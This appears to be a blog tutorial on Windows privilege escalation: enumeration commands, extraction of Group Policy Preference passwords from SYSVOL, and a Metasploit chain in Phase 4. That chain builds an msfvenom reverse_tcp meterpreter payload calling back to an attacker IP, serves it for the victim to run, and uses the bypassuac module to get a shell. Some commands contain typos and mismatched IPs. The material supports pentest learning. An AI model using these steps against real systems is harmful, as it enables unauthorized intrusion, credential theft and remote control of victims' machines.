PRIVILEGE ESCALATION
Hey guys today we will talk about techniques to do Privilege Escalation on Windows Operating System.
So what is Privilege Escalation ? A privilege escalation attack is a type of network intrusion that takes advantage of programming errors or design flaws to grant the attacker elevated access to the network and its associated data and applications. For example, an attacker with a privilege set of "read only" permissions somehow elevates the set to include "read and write."
Privilege, in an information technology context, can be defined as the authority a given account or process has within a computing system or network. Below is the image given to explain Privilege Escalation.
📷
As we can see the upward arrow in the diagram an hacker tries to gain access from a Normal User to the Kernel.
So before we start doing Privilege Escalation the first thing we need to do is information gathering of the system. So let’s start gathering some basic information from the current operating system.
Phase 1
So the first thing we need to find out is what type of user are we having access. To get this information we need to type the following command in the terminal -
$whoami
📷
2. So now let’s find out what OS we are connected to. To get this information we need to type the following command in the terminal -
$systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
📷
3. So now let’s find out what the hostname is of the user and what user we are connected as. To get this information we need to type the following command in the terminal -
$hostname
📷
4. So let’s find out the basic information we list the other user accounts on the box and view our own user's information in a bit more detail. To get this information we need to type following command in the terminal -
$net users
📷
Now this is this all basic information we can collect about user and get to know what permissions we have at the moment.
Phase 2
In this face we need to collect information on networking, what is the machine connected to and what rules does it impose on those connections.
So let’s find out the available network interface and the routing table. To get this information we need to type the following command in the terminal -
$ipconfig /all
$route print
📷
📷
2. Now let’s find out the details of ARP cache table for all available interfaces. To get this information we need to type the following command in the terminal -
$arp -A
📷
3. So now let’s find out information of active network connections and the firewall rules. To get this information we need to type the following command in the terminal -
$netstat -ano
📷
4. So finally we need to take a look at what is running on the compromised box, scheduled task, running processes, started services and installed drivers. To get this information we need to type the following command in the terminal -
$schtasks /query /fo LIST /v
📷
📷
📷
📷
📷
📷
One quick tip you guys can use a very good tool for all this information gathering “WMIC” (Windows Management Instrumentation Command-Line)
Once you install this tool you can type the following command in the terminal to know about what information you want to gather with the help of commands available in it.
$wmic /?
📷
The first important thing is we need to look at is the patchlevel. There is no need to worry ourselves further if we see that the host is badly patched. My WMIC script will already list all the installed patches. To check this we need to type the following command in the terminal -
$wmic qfe get Caption, Description,HotFixID,InstalledOn
📷
📷
📷
So we need to make a review on all the vulnerabilities that we can see in the result after the typing the above command. The best strategy is to look for privilege escalation exploits and look up their respective KB patch numbers. I have listed resources below that are well worth reading on the subject matter:
Resource - https://www.computerhope.com/wmic.htm
Phase 3
In this phase we will check out the Group Policy Preference. If you compromised box is connected to a domain it is an important thing to have a look on “Group.xml” file which is stored in SYSVOL. Any authenticated user will have read access to this file. The password in the xml file is encrypted in AES encryption type, to decrypt this password we need to visit the msdn website where the static key is published. So for checking this vulnerability we need to go into
SYSVOL - Groups
Open the Groups.xml file in text format to view the encrypted password.
Once we able to see the encrypted password we need to visit msdn website to decrypt it.
Phase 4
So in this face we will learn how to bypass UAC with metasploit.
So in metasploit once we exploit the target and have access to the target machine and want to bypass the UAC we need to obtain meterpreter.
$msfvenom -p windows/meterpreter/reverse_tcp det lhost=192.168.0.101 set lport=4457 -f exe > /root/Desktop/file.exe
📷
📷
2. $msfconsole
📷
📷
. $use exploit/multi/handler
$set lhost 192.196.0.101
$ set lport 4457
$options
📷
4. $set payload windows/meterpreter/reverse_tcp
$options
📷
.$ run
📷
Now open a new terminal and type the following command
6. $python -m SimpleHTTPServer 80
📷
After running this command now in the windows system open your browser and type the lhost ip i.e 192.196.0.101 you will the the list of files present on your kali linux desktop download the file.exe file and install that
📷
After installing go back to the first terminal where the command $run was been executed ypou may see the following results.
📷
Now type the following commands
7. $sessions 1
$sysinfo
$search bypassuac
You may now see the system info of the windows machine
📷
8. $ use exploit/windows/local/bypassuac
$ set session 1
$ run
$ shell
Typing shell will help you enter the victims command prompt
📷
Author - Dhanesh Dodia & Jenni Patel
Working as an Cyber Security Analyst trainee and researcher in the field of Network & Web-Applications Penetration Testing.
Resources
Final suggestion - This guide is meant to be a "fundamentals" for Windows privilege escalation. If you want to truly master the subject you will need to put in a lot of work and research. As with all aspects of pentesting, enumeration is key, the more you know about the target the more avenues of attack you have the higher the rate of success.
Комментарии